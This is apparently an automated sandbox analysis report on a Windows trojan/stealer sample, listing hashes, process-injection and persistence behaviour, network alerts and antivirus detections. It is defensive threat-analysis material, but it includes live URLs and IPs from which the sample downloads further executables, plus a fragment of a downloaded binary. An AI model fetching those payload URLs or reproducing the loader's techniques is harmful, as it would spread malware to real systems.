Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Aug. 9, 2024, 9:23 a.m.	Aug. 9, 2024, 9:27 a.m.

Size	1.8MB
Type	PE32+ executable (console) x86-64, for MS Windows
MD5	`5325fec9552fa277891e782b77a475ee`
SHA256	`dac27e7fd9e2fac74290b5c431bb73f290987b8344eb1beeb902efa0a403140a`
CRC32	`29A1DD75`
ssdeep	`49152:AB1BRf3rOSzOzrFNj8e1KbWF8K7Vk3SZTH4OWOEkw/R8mDYWg11pb67P:gaRrFCIlQ7P`
Yara	Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature Malicious_Packer_Zero - Malicious Packer IsPE64 - (no description) Antivirus - Contains references to security software UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check

file200h.exe "C:\Users\test22\AppData\Local\Temp\file200h.exe"
1836
- CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2080
  - BTzo3BvtVSNmg8v5fXvV45J7.exe "C:\Users\test22\Pictures\BTzo3BvtVSNmg8v5fXvV45J7.exe"
    2288

Name	Response	Post-Analysis Lookup
yip.su	A 104.21.79.77 A 172.67.169.89	172.67.169.89
raw.githubusercontent.com	A 185.199.109.133 A 185.199.111.133 A 185.199.110.133 A 185.199.108.133	185.199.108.133
pastebin.com	A 104.20.4.235 A 172.67.19.24 A 104.20.3.235	104.20.4.235
cacerts.digicert.com	CNAME fp2e7a.wpc.2be4.phicdn.net CNAME fp2e7a.wpc.phicdn.net A 152.195.38.76	152.195.38.76
github.com	A 20.200.245.247	20.200.245.247
ironmanrecycling.com	A 147.45.60.44	147.45.60.44
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.130.233

IP Address	Status	Action
104.20.3.235	Active	Moloch
147.45.60.44	Active	Moloch
152.195.38.76	Active	Moloch
162.159.135.233	Active	Moloch
164.124.101.2	Active	Moloch
172.67.169.89	Active	Moloch
185.199.111.133	Active	Moloch
194.58.114.223	Active	Moloch
20.200.245.247	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2014169	ET DNS Query for .su TLD (Soviet Union) Often Malware Related	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 104.20.3.235:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49166 -> 172.67.169.89:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49167 -> 20.200.245.247:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
UDP 192.168.56.103:62576 -> 164.124.101.2:53	2035466	ET INFO Observed Discord Domain in DNS Lookup (discordapp .com)	Misc activity
TCP 192.168.56.103:49170 -> 162.159.135.233:443	2035464	ET INFO Observed Discord Domain (discordapp .com in TLS SNI)	Misc activity
TCP 192.168.56.103:49170 -> 162.159.135.233:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 194.58.114.223:80 -> 192.168.56.103:49168	2049228	ET HUNTING Redirect to Discord Attachment Download	Misc activity
TCP 147.45.60.44:80 -> 192.168.56.103:49169	2014819	ET INFO Packed Executable Download	Misc activity
TCP 192.168.56.103:49171 -> 185.199.111.133:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 147.45.60.44:80 -> 192.168.56.103:49169	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 147.45.60.44:80 -> 192.168.56.103:49169	2016538	ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download	Potentially Bad Traffic

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.103:49165 104.20.3.235:443	C=US, O=Google Trust Services, CN=WE1	CN=pastebin.com	82:49:c5:04:9a:bd:a9:c1:ab:4d:ff:95:b9:94:74:cc:40:bc:09:7f
TLS 1.2 192.168.56.103:49166 172.67.169.89:443	C=US, O=Google Trust Services, CN=WE1	CN=yip.su	cd:f2:dd:c5:ee:57:d1:5f:01:8c:10:00:ac:b5:85:96:0e:f7:0a:32
TLS 1.2 192.168.56.103:49167 20.200.245.247:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo ECC Domain Validation Secure Server CA	CN=github.com	e7:03:5b:cc:1c:18:77:1f:79:2f:90:86:6b:6c:1d:f8:df:aa:bd:c0
TLS 1.2 192.168.56.103:49170 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=discordapp.com	97:8b:ee:ad:1e:bf:a1:69:e7:94:29:f7:55:7a:29:64:19:c7:81:39
TLS 1.2 192.168.56.103:49171 185.199.111.133:443	C=US, O=DigiCert Inc, CN=DigiCert Global G2 TLS RSA SHA256 2020 CA1	C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io	97:d8:c5:70:0f:12:24:6c:88:bc:fa:06:7e:8c:a7:4d:a8:62:67:28

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 9, 2024, 9:23 a.m.			0	0
IsDebuggerPresent Aug. 9, 2024, 9:23 a.m.			0	0

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Aug. 9, 2024, 9:23 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.managed
section	hydrated

The file contains an unknown PE resource name possibly indicative of a packer (1 event)

resource name

BINARY

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (6 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://194.58.114.223/d/385104
suspicious_features	GET method with no useragent header	suspicious_request	GET http://ironmanrecycling.com/get/setup1.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://pastebin.com/raw/E0rY26ni
suspicious_features	GET method with no useragent header	suspicious_request	GET https://yip.su/RNWPd.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://github.com/evan9908/Setup/raw/main/Umar.exe
suspicious_features	GET method with no useragent header	suspicious_request	GET https://cdn.discordapp.com/attachments/1271038807315185718/1271141416722235504/setup.exe?ex=66b64232&is=66b4f0b2&hm=54ce8f39d23ca603ff6f30c94a6a47d0c4b423d21c32cc49cdd2dfd3da22283e&

Performs some HTTP requests (7 events)

request	GET http://194.58.114.223/d/385104
request	GET http://ironmanrecycling.com/get/setup1.exe
request	GET http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
request	GET https://pastebin.com/raw/E0rY26ni
request	GET https://yip.su/RNWPd.exe
request	GET https://github.com/evan9908/Setup/raw/main/Umar.exe
request	GET https://cdn.discordapp.com/attachments/1271038807315185718/1271141416722235504/setup.exe?ex=66b64232&is=66b4f0b2&hm=54ce8f39d23ca603ff6f30c94a6a47d0c4b423d21c32cc49cdd2dfd3da22283e&

Allocates read-write-execute memory (usually to unpack itself) (21 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 393216 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00410000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00430000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f61000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f62000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02170000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004a2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005db000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005d7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00960000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004aa000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005c7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005cb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004ac000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 9, 2024, 9:24 a.m.	process_identifier: 2288 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 53248 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x005fd000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 9, 2024, 9:24 a.m.	process_identifier: 2288 region_size: 45056 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00330000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates executable files on the filesystem (6 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BYAZ7pdl5rK2PvyyEe50nTvj.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8ImS7r4f6TvY2QZlsG10cxIi.bat
file	C:\Users\test22\AppData\Local\C2BMvIQsna2roqUBOAHQ6Tht.exe
file	C:\Users\test22\Pictures\gPAxR3dKu8yeRVfwOVVEpBSr.exe
file	C:\Users\test22\AppData\Local\0u303Rucbs7Qvz3ic0rFrq94.exe
file	C:\Users\test22\Pictures\BTzo3BvtVSNmg8v5fXvV45J7.exe

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\C2BMvIQsna2roqUBOAHQ6Tht.exe

A process created a hidden window (2 events)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Aug. 9, 2024, 9:23 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\gPAxR3dKu8yeRVfwOVVEpBSr.exe parameters: filepath: C:\Users\test22\Pictures\gPAxR3dKu8yeRVfwOVVEpBSr.exe		0	0
ShellExecuteExW Aug. 9, 2024, 9:23 a.m.	show_type: 0 filepath_r: C:\Users\test22\Pictures\BTzo3BvtVSNmg8v5fXvV45J7.exe parameters: filepath: C:\Users\test22\Pictures\BTzo3BvtVSNmg8v5fXvV45J7.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Aug. 9, 2024, 9:23 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the process caspol.exe (1 event)

Time & API	Arguments	Status	Return	Repeated
recv Aug. 9, 2024, 9:23 a.m.	buffer: HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 00:25:16 GMT Server: nginx/1.26.1 Content-Type: application/x-dosexec Content-Length: 218624 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $§xãíÜãíÜãíÜ^¢ÜáíÜý¿ÜÁíÜý¿ÜúíÜý¿ÜcíÜÄ+mÜæíÜãíÜíÜý¿ÜâíÜý¿ÜâíÜý¿ÜâíÜRichãíÜPELâ]dà ÎÛ°@ò lË<8q°¨.textû `.rdataÆ$°&@@.dataè)à&¾@À.rsrc8qrä@@ÿ%0°B; àBuóÃéÐÿUìì S3Û9]uèSSSSSÇèÄÈÿëME;ÃtÜVEèEàEPSÿuEàPÇEäÿÿÿÇEìBè ÄÿMäðxEàëEàPSèaYYÆ^[ÉÃÿUìì S3Û9]uèSSSSSÇèÄÈÿëNE;ÃtÜVÿuEèÿuEàÿuEàPÇEäÿÿÿÇEìBè ÄÿMäðxEàëEàPSèãYYÆ^[ÉÃÿUìÿujÿuÿuèmÿÿÿÄ]ÃÿUìQeüVEüPÿuÿuè¸ðÄöu9Eütè\Àt èSMüÆ^ÉÃjhÇBèZ3À3ö9uÀ;ÆuèÇVVVVVè²ÄÈÿë8ètPVèYYuüÿuÿuÿuèZPÿUÄEäÇEüþÿÿÿèEäè7Ã3öè4PVè³YYÃÿUìEPjÿuh-@èbÿÿÿÄ]ÃÿUìj jÿuèT-Ä]ÃÿUì]éßÿÿÿjh0ÇBè3ÿ}ä3Àu;÷À;Çu èaÇWWWWWèéÄÈÿé´Vè~Y}üöF@uwVè0YøÿtøþtÐÁúÈáÁáÀèCë¹äBöA$u)øÿtøþtÈÁùàÁàÀèCë¸äBö@$tèÖÇWWWWWè^ÄMäÿ9}äuÿNx ¶AëVè,YEäÇEüþÿÿÿèEäèïÃuVè4YÃÿUìQSVWÿ5¤èCè0ÿ5 èCø}üès0ðYY;÷Þ+ßCørwWè¨6øCY;øsH¸;øsÇÇ;ÇrPÿuüèä5YYÀuG;Çr@PÿuüèÎ5YYÀt1ÁûP4è/Y£¤èCÿuè/ÆVèu/Y£ èCEYë3À_^[ÉÃÿVjj è85ðVèN/Ä£¤èC£ èCöujX^Ã&3À^ÃjhPÇBè§è-7eüÿuèøþÿÿYEäÇEüþÿÿÿè EäèÃÃè7ÃÿUìÿuè·ÿÿÿ÷ØÀ÷ØYH]ÃjhpÇBèT3À3ö9uÀ;Æuè$ÇVVVVVè¬ÄÈÿë_ènj [ÃPjèyYYuüèWÃPè,9YøEPVÿuè?ÃPèEäè/ÃPWè9ÄÇEüþÿÿÿè Eäè Ãè À PjèYYÃ¡àBÈ3É9`þBÁÁÃÿUì=lþBuèz;ÿuèÇ9hÿèé5YY]ÃjXhÇBèf3öuüEPÿ°Bjþ_}ü¸MZf9@u8¡<@¸@PEu'¹f9@u¸t@v3É9°è@ÁMäëuä3ÛCSèW@YÀujèXÿÿÿYè{1ÀujèGÿÿÿYèè?]üèÌÀ}jèè4YèÉ?£äùCèh?£hþBè°>À}jèÃ4Yèp<À}j è²4YSèj5Y;ÆtPè 4Yè<]Ät·MÈëj YQPVh@è¿:Eà9uäuPèá6è7}üë5Eì MÜPQèc:YYÃeèEÜEà received: 2920 socket: 1612	1	2920	0

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00003200', u'virtual_address': u'0x00208000', u'entropy': 7.81103159686864, u'name': u'.rsrc', u'virtual_size': u'0x000030a0'}

entropy

7.81103159687

description

A section with a high entropy has been found

Potentially malicious URLs were found in the process memory dump (1 event)

url	https://docs.microsoft.com/windows/win32/fileio/maximum-file-path-limitation

Yara rule detected in process memory (7 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Bypass DEP	rule	disable_dep

Communicates with host for which no DNS query was performed (1 event)

host

194.58.114.223

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000010c	1	0	0

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation Aug. 9, 2024, 9:23 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (2 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8ImS7r4f6TvY2QZlsG10cxIi.bat
file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BYAZ7pdl5rK2PvyyEe50nTvj.bat

Drops a binary and executes it (1 event)

file	C:\Users\test22\Pictures\gPAxR3dKu8yeRVfwOVVEpBSr.exe

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1836 resumed a thread in remote process 2080
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x0000000000000108 suspend_count: 1 process_identifier: 2080	1	0	0

Executed a process and injected code into it, probably while unpacking (19 events)

Time & API	Arguments	Status	Return
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x00000000000000b0 suspend_count: 1 process_identifier: 1836	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x00000000000000e8 suspend_count: 1 process_identifier: 1836	1	0
CreateProcessInternalW Aug. 9, 2024, 9:23 a.m.	thread_identifier: 2084 thread_handle: 0x0000000000000108 process_identifier: 2080 current_directory: filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe track: 1 command_line: filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe stack_pivoted: 0 creation_flags: 4 (CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x000000000000010c	1	1
NtUnmapViewOfSection Aug. 9, 2024, 9:23 a.m.	base_address: 0x0000000000400000 region_size: 5898240 process_identifier: 2080 process_handle: 0x000000000000010c		-1073741799
NtAllocateVirtualMemory Aug. 9, 2024, 9:23 a.m.	process_identifier: 2080 region_size: 32768 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0000000000400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000000000010c	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x0000000000000108 suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x000000dc suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x00000194 suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x00000198 suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x000002a4 suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x000003b8 suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x00000618 suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x00000638 suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x00000668 suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x00000694 suspend_count: 1 process_identifier: 2080	1	0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x000006d8 suspend_count: 1 process_identifier: 2080	1	0
CreateProcessInternalW Aug. 9, 2024, 9:23 a.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\gPAxR3dKu8yeRVfwOVVEpBSr.exe track: 0 command_line: "C:\Users\test22\Pictures\gPAxR3dKu8yeRVfwOVVEpBSr.exe" filepath_r: C:\Users\test22\Pictures\gPAxR3dKu8yeRVfwOVVEpBSr.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000		0
NtResumeThread Aug. 9, 2024, 9:23 a.m.	thread_handle: 0x0000069c suspend_count: 1 process_identifier: 2080	1	0
CreateProcessInternalW Aug. 9, 2024, 9:23 a.m.	thread_identifier: 2292 thread_handle: 0x000007a0 process_identifier: 2288 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\Pictures\BTzo3BvtVSNmg8v5fXvV45J7.exe track: 1 command_line: "C:\Users\test22\Pictures\BTzo3BvtVSNmg8v5fXvV45J7.exe" filepath_r: C:\Users\test22\Pictures\BTzo3BvtVSNmg8v5fXvV45J7.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000007c4	1	1

File has been identified by 55 AntiVirus engines on VirusTotal as malicious (50 out of 55 events)

Bkav	W64.AIDetectMalware
Lionic	Trojan.Win32.Dacic.i!c
Elastic	malicious (high confidence)
Skyhigh	BehavesLike.Win64.Generic.th
ALYac	Generic.Dacic.3448.4E2E6657
Cylance	Unsafe
VIPRE	Generic.Dacic.3448.4E2E6657
Sangfor	Infostealer.Win64.Kryptik.Vru7
K7AntiVirus	Trojan ( 005b84c31 )
BitDefender	Generic.Dacic.3448.4E2E6657
K7GW	Trojan ( 005b84c31 )
VirIT	Trojan.Win64.Genus.GZR
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of Win64/GenKryptik.GZWY
McAfee	Artemis!5325FEC9552F
Avast	Win64:PWSX-gen [Trj]
ClamAV	Win.Malware.Dacic-10033090-0
Kaspersky	Trojan-PSW.Win32.Cryptnot.bay
Alibaba	TrojanPSW:Win64/Cryptnot.88e465ed
MicroWorld-eScan	Generic.Dacic.3448.4E2E6657
Rising	Downloader.PBLoader!8.1958F (CLOUD)
Emsisoft	Generic.Dacic.3448.4E2E6657 (B)
F-Secure	Trojan.TR/AD.Nekark.vwjxx
DrWeb	BackDoor.Remcos.433
Zillya	Backdoor.Remcos.Win32.7415
TrendMicro	Trojan.Win64.OPERALOADER.YXEGXZ
McAfeeD	ti!DAC27E7FD9E2
FireEye	Generic.Dacic.3448.4E2E6657
Sophos	Mal/Generic-S
Webroot	W32.Trojan.Gen
Google	Detected
Avira	TR/AD.Nekark.vwjxx
MAX	malware (ai score=84)
Antiy-AVL	Trojan/Win64.GenKryptik
Kingsoft	Win32.Trojan-PSW.Cryptnot.bay
Gridinsoft	Trojan.Heur!.00290023
Xcitium	Malware@#1qa25s8gv91x
Microsoft	Trojan:Win64/Stealerc.GPA!MTB
ViRobot	Trojan.Win.Z.Genkryptik.1859680
ZoneAlarm	Trojan-PSW.Win32.Cryptnot.bay
GData	Generic.Dacic.3448.4E2E6657
Varist	W64/Kryptik.GRY
AhnLab-V3	Trojan/Win.Generic.R658964
DeepInstinct	MALICIOUS
Ikarus	Trojan-Spy.Win64.Agent
Panda	Trj/GdSda.A
TrendMicro-HouseCall	Trojan.Win64.OPERALOADER.YXEGXZ
Tencent	Malware.Win32.Gencirc.10c01f33
Yandex	Trojan.PWS.Stealer!b4z04TM+0o0
huorong	HEUR:Trojan/Injector.as

file200h.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All